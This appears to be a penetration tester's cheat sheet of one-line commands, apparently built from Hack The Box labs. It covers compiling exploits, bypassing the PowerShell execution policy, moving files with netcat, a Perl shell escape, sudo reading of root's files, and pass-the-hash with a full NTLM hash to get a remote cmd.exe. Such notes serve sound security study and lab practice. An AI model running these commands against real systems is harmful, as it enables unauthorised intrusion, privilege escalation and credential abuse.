MISC
Compiling Exploits
gcc -o exploit exploit.c
# Compile C code; add -m32 after 'gcc' to compile 32-bit code on 64-bit Linux
Cross compiling
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
Compile Windows exploit in Linux
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe
Compile Python script to executable
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py
Packet Inspection
tcpdump -i eth0 -w output.pcap tcp port 80
# Options before the capture filter; GNU getopt tolerates the other order, BSD/macOS tcpdump does not
PowerShell execution policy bypass
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1
Windows Exploit Suggester
./windows-exploit-suggester.py -d 2019-07-20-mssb.xls -i system.txt
Finding nmap NSE scripts (e.g. SMB vulnerability scripts)
ls /usr/share/nmap/scripts/ | grep smb | grep vuln
Netcat
File transfer from attacker to target
At target
nc -lvp 6969 > blah.txt
At attacker (method 1)
nc x.x.x.x 6969 < blah.txt
At attacker (method 2)
cat blah.txt | nc x.x.x.x 6969
Perl Exploit
perl -e 'exec "/bin/sh";'
sudo perl -F: -lane 'print $F[0]' /root/root.txt
Awk
Remove duplicate lines:
awk '!seen[$0]++' file
Searchsploit
searchsploit --overflow --exact --mirror 21234
searchsploit --overflow --exact Gwolle
Firewall rule enable (ufw)
ufw allow from victimip to any port 80,443 proto tcp
Wordlist creation
cewl -w cewl-forum.txt -e -a http://forum.bart.htb
Pass the Hash
pth-winexe -U jenkins/administrator //ip cmd.exe
pth-winexe -U jenkins/administrator%password //ip cmd.exe
crackmapexec
pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
Mount a VMware shared folder (Windows host to Linux guest)
mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other